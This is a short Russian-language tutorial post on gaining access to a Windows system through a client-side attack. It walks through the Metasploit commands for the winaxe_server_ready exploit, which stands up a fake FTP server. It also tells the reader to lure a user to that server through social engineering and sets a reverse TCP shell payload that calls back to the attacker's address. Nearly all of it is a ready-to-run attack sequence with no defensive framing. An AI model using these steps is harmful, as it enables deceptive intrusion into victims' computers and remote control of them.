Получение доступа к системе через клиентские атаки
Sam SepiolПодбираем эксплоит и пейлоад. Делаем так что метасплоит будет работать в режиме сервера.
Создаем фейковый FTP сервер. После отправляем ссылку на сервер пользователю с помощью социальной инженерии.
msf5 > search type:exploit platform:windows winaxe
use exploit/windows/ftp/winaxe_server_ready
далее выбираем payload, к его выбору нужно отнестись серьезно. Payload будет создавать самостоятельный процес.
show payloads
set payload windows/shell/reverse_tcp
set options
set SRVHOST 192.168.1.10
set lhost 192.168.1.10
exploit
после запуска метасплоит будет работать в режиме сервера FTP
sessions